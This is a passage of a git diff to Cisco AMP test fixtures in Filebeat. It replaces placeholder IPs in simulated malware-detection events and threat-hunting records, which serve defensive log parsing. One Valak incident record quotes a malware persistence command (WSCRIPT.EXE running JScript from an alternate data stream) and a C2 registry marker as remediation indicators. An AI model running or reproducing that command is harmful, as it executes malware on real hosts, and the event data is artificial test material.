"cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2166,7 +2166,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 55057, + "log.offset": 55252, "process.hash.md5": "92f44e405db16ac55d97e3bfe3b132fa", "process.hash.sha1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d", "process.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", @@ -2182,7 +2182,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -2198,7 +2198,7 @@ "@timestamp": "2020-12-25T05:30:44.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2230,7 +2230,7 @@ "host.hostname": "Demo_AMP_Intel", "host.name": "Demo_AMP_Intel", "input.type": "log", - "log.offset": 56674, + "log.offset": 56874, "related.hash": [ "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117" ], @@ -2239,7 +2239,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2253,7 +2253,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2288,7 +2288,7 @@ "host.hostname": "Demo_AMP_Intel", "host.name": "Demo_AMP_Intel", "input.type": "log", - "log.offset": 57784, + "log.offset": 57989, "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7", "related.hash": [ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" @@ -2298,7 +2298,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2312,7 +2312,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -2347,7 +2347,7 @@ "host.hostname": "Demo_AMP_Intel", "host.name": "Demo_AMP_Intel", "input.type": "log", - "log.offset": 59541, + "log.offset": 59751, "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7", "related.hash": [ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" @@ -2357,7 +2357,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2369,7 +2369,7 @@ "@timestamp": "2020-12-25T05:02:27.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2421,7 +2421,7 @@ "host.hostname": "Demo_AMP_Intel", "host.name": "Demo_AMP_Intel", "input.type": "log", - "log.offset": 61194, + "log.offset": 61409, "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", "related.hash": [ "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0" @@ -2431,7 +2431,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2443,7 +2443,7 @@ "@timestamp": "2020-12-25T05:02:26.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2495,7 +2495,7 @@ "host.hostname": "Demo_AMP_Intel", "host.name": "Demo_AMP_Intel", "input.type": "log", - "log.offset": 62768, + "log.offset": 62988, "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", "related.hash": [ "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4" 
@@ -2505,7 +2505,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2517,7 +2517,7 @@ "@timestamp": "2020-12-25T04:32:53.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2599,7 +2599,7 @@ "host.hostname": "Demo_AMP_Intel", "host.name": "Demo_AMP_Intel", "input.type": "log", - "log.offset": 64342, + "log.offset": 64567, "process.hash.sha256": "71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243", "related.hash": [ "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc" @@ -2609,7 +2609,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2621,7 +2621,7 @@ "@timestamp": "2020-12-25T04:22:45.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2647,13 +2647,13 @@ "host.hostname": "Demo_AMP_Intel", "host.name": "Demo_AMP_Intel", "input.type": "log", - "log.offset": 66455, + "log.offset": 66685, "related.hosts": [ "Demo_AMP_Intel" ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2665,7 +2665,7 @@ "@timestamp": "2020-12-25T04:07:21.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -2697,13 +2697,13 @@ "host.hostname": "Demo_AMP_Intel", "host.name": "Demo_AMP_Intel", "input.type": "log", - "log.offset": 67379, + "log.offset": 67614, "related.hosts": [ "Demo_AMP_Intel" ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2715,7 +2715,7 @@ "@timestamp": "2020-12-25T04:06:40.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2742,13 +2742,13 @@ "host.hostname": "Demo_AMP_Intel", "host.name": "Demo_AMP_Intel", "input.type": "log", - "log.offset": 68455, + "log.offset": 68695, "related.hosts": [ "Demo_AMP_Intel" ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log index ae6c21d78ff0..ded43bea1625 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log 
@@ -1,42 +1,42 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. 
Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n - Review all activity performed by the user\r\n - Upload any suspicious files to ThreatGrid for analysis\r\n - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55808,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":900000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55807,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
